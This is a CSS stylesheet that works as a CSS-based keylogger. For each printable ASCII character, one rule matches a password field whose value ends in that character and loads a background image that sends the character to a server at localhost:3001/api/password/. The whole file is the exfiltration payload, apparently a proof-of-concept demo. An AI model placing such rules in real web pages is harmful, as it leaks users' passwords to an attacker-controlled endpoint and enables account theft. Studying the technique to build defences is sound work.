input[type='password'][value$=' '] {
  background-image: url('https://localhost:3001/api/password/+');
}
input[type='password'][value$='!'] {
  background-image: url('https://localhost:3001/api/password/%21');
}
input[type='password'][value$='"'] {
  background-image: url('https://localhost:3001/api/password/%22');
}
input[type='password'][value$='#'] {
  background-image: url('https://localhost:3001/api/password/%23');
}
input[type='password'][value$='$'] {
  background-image: url('https://localhost:3001/api/password/%24');
}
input[type='password'][value$='%'] {
  background-image: url('https://localhost:3001/api/password/%25');
}
input[type='password'][value$='&'] {
  background-image: url('https://localhost:3001/api/password/%26');
}
input[type='password'][value$="'"] {
  background-image: url('https://localhost:3001/api/password/%27');
}
input[type='password'][value$='('] {
  background-image: url('https://localhost:3001/api/password/%28');
}
input[type='password'][value$=')'] {
  background-image: url('https://localhost:3001/api/password/%29');
}
input[type='password'][value$='*'] {
  background-image: url('https://localhost:3001/api/password/%2A');
}
input[type='password'][value$='+'] {
  background-image: url('https://localhost:3001/api/password/%2B');
}
input[type='password'][value$=','] {
  background-image: url('https://localhost:3001/api/password/%2C');
}
input[type='password'][value$='-'] {
  background-image: url('https://localhost:3001/api/password/-');
}
input[type='password'][value$='.'] {
  background-image: url('https://localhost:3001/api/password/.');
}
input[type='password'][value$='/'] {
  background-image: url('https://localhost:3001/api/password/%2F');
}
input[type='password'][value$='0'] {
  background-image: url('https://localhost:3001/api/password/0');
}
input[type='password'][value$='1'] {
  background-image: url('https://localhost:3001/api/password/1');
}
input[type='password'][value$='2'] {
  background-image: url('https://localhost:3001/api/password/2');
}
input[type='password'][value$='3'] {
  background-image: url('https://localhost:3001/api/password/3');
}
input[type='password'][value$='4'] {
  background-image: url('https://localhost:3001/api/password/4');
}
input[type='password'][value$='5'] {
  background-image: url('https://localhost:3001/api/password/5');
}
input[type='password'][value$='6'] {
  background-image: url('https://localhost:3001/api/password/6');
}
input[type='password'][value$='7'] {
  background-image: url('https://localhost:3001/api/password/7');
}
input[type='password'][value$='8'] {
  background-image: url('https://localhost:3001/api/password/8');
}
input[type='password'][value$='9'] {
  background-image: url('https://localhost:3001/api/password/9');
}
input[type='password'][value$=':'] {
  background-image: url('https://localhost:3001/api/password/%3A');
}
input[type='password'][value$=';'] {
  background-image: url('https://localhost:3001/api/password/%3B');
}
input[type='password'][value$='<'] {
  background-image: url('https://localhost:3001/api/password/%3C');
}
input[type='password'][value$='='] {
  background-image: url('https://localhost:3001/api/password/%3D');
}
input[type='password'][value$='>'] {
  background-image: url('https://localhost:3001/api/password/%3E');
}
input[type='password'][value$='?'] {
  background-image: url('https://localhost:3001/api/password/%3F');
}
input[type='password'][value$='@'] {
  background-image: url('https://localhost:3001/api/password/%40');
}
input[type='password'][value$='A'] {
  background-image: url('https://localhost:3001/api/password/A');
}
input[type='password'][value$='B'] {
  background-image: url('https://localhost:3001/api/password/B');
}
input[type='password'][value$='C'] {
  background-image: url('https://localhost:3001/api/password/C');
}
input[type='password'][value$='D'] {
  background-image: url('https://localhost:3001/api/password/D');
}
input[type='password'][value$='E'] {
  background-image: url('https://localhost:3001/api/password/E');
}
input[type='password'][value$='F'] {
  background-image: url('https://localhost:3001/api/password/F');
}
input[type='password'][value$='G'] {
  background-image: url('https://localhost:3001/api/password/G');
}
input[type='password'][value$='H'] {
  background-image: url('https://localhost:3001/api/password/H');
}
input[type='password'][value$='I'] {
  background-image: url('https://localhost:3001/api/password/I');
}
input[type='password'][value$='J'] {
  background-image: url('https://localhost:3001/api/password/J');
}
input[type='password'][value$='K'] {
  background-image: url('https://localhost:3001/api/password/K');
}
input[type='password'][value$='L'] {
  background-image: url('https://localhost:3001/api/password/L');
}
input[type='password'][value$='M'] {
  background-image: url('https://localhost:3001/api/password/M');
}
input[type='password'][value$='N'] {
  background-image: url('https://localhost:3001/api/password/N');
}
input[type='password'][value$='O'] {
  background-image: url('https://localhost:3001/api/password/O');
}
input[type='password'][value$='P'] {
  background-image: url('https://localhost:3001/api/password/P');
}
input[type='password'][value$='Q'] {
  background-image: url('https://localhost:3001/api/password/Q');
}
input[type='password'][value$='R'] {
  background-image: url('https://localhost:3001/api/password/R');
}
input[type='password'][value$='S'] {
  background-image: url('https://localhost:3001/api/password/S');
}
input[type='password'][value$='T'] {
  background-image: url('https://localhost:3001/api/password/T');
}
input[type='password'][value$='U'] {
  background-image: url('https://localhost:3001/api/password/U');
}
input[type='password'][value$='V'] {
  background-image: url('https://localhost:3001/api/password/V');
}
input[type='password'][value$='W'] {
  background-image: url('https://localhost:3001/api/password/W');
}
input[type='password'][value$='X'] {
  background-image: url('https://localhost:3001/api/password/X');
}
input[type='password'][value$='Y'] {
  background-image: url('https://localhost:3001/api/password/Y');
}
input[type='password'][value$='Z'] {
  background-image: url('https://localhost:3001/api/password/Z');
}
input[type='password'][value$='['] {
  background-image: url('https://localhost:3001/api/password/%5B');
}
input[type='password'][value$='\\'] {
  background-image: url('https://localhost:3001/api/password/%5C');
}
input[type='password'][value$=']'] {
  background-image: url('https://localhost:3001/api/password/%5D');
}
input[type='password'][value$='^'] {
  background-image: url('https://localhost:3001/api/password/%5E');
}
input[type='password'][value$='_'] {
  background-image: url('https://localhost:3001/api/password/_');
}
input[type='password'][value$='`'] {
  background-image: url('https://localhost:3001/api/password/%60');
}
input[type='password'][value$='a'] {
  background-image: url('https://localhost:3001/api/password/a');
}
input[type='password'][value$='b'] {
  background-image: url('https://localhost:3001/api/password/b');
}
input[type='password'][value$='c'] {
  background-image: url('https://localhost:3001/api/password/c');
}
input[type='password'][value$='d'] {
  background-image: url('https://localhost:3001/api/password/d');
}
input[type='password'][value$='e'] {
  background-image: url('https://localhost:3001/api/password/e');
}
input[type='password'][value$='f'] {
  background-image: url('https://localhost:3001/api/password/f');
}
input[type='password'][value$='g'] {
  background-image: url('https://localhost:3001/api/password/g');
}
input[type='password'][value$='h'] {
  background-image: url('https://localhost:3001/api/password/h');
}
input[type='password'][value$='i'] {
  background-image: url('https://localhost:3001/api/password/i');
}
input[type='password'][value$='j'] {
  background-image: url('https://localhost:3001/api/password/j');
}
input[type='password'][value$='k'] {
  background-image: url('https://localhost:3001/api/password/k');
}
input[type='password'][value$='l'] {
  background-image: url('https://localhost:3001/api/password/l');
}
input[type='password'][value$='m'] {
  background-image: url('https://localhost:3001/api/password/m');
}
input[type='password'][value$='n'] {
  background-image: url('https://localhost:3001/api/password/n');
}
input[type='password'][value$='o'] {
  background-image: url('https://localhost:3001/api/password/o');
}
input[type='password'][value$='p'] {
  background-image: url('https://localhost:3001/api/password/p');
}
input[type='password'][value$='q'] {
  background-image: url('https://localhost:3001/api/password/q');
}
input[type='password'][value$='r'] {
  background-image: url('https://localhost:3001/api/password/r');
}
input[type='password'][value$='s'] {
  background-image: url('https://localhost:3001/api/password/s');
}
input[type='password'][value$='t'] {
  background-image: url('https://localhost:3001/api/password/t');
}
input[type='password'][value$='u'] {
  background-image: url('https://localhost:3001/api/password/u');
}
input[type='password'][value$='v'] {
  background-image: url('https://localhost:3001/api/password/v');
}
input[type='password'][value$='w'] {
  background-image: url('https://localhost:3001/api/password/w');
}
input[type='password'][value$='x'] {
  background-image: url('https://localhost:3001/api/password/x');
}
input[type='password'][value$='y'] {
  background-image: url('https://localhost:3001/api/password/y');
}
input[type='password'][value$='z'] {
  background-image: url('https://localhost:3001/api/password/z');
}
input[type='password'][value$='{'] {
  background-image: url('https://localhost:3001/api/password/%7B');
}
input[type='password'][value$='|'] {
  background-image: url('https://localhost:3001/api/password/%7C');
}
input[type='password'][value$='\\}'] {
  background-image: url('https://localhost:3001/api/password/%7D');
}
input[type='password'][value$='~'] {
  background-image: url('https://localhost:3001/api/password/~');
}
input[type='password'][value$=''] {
  background-image: url('https://localhost:3001/api/password/%7F');
}
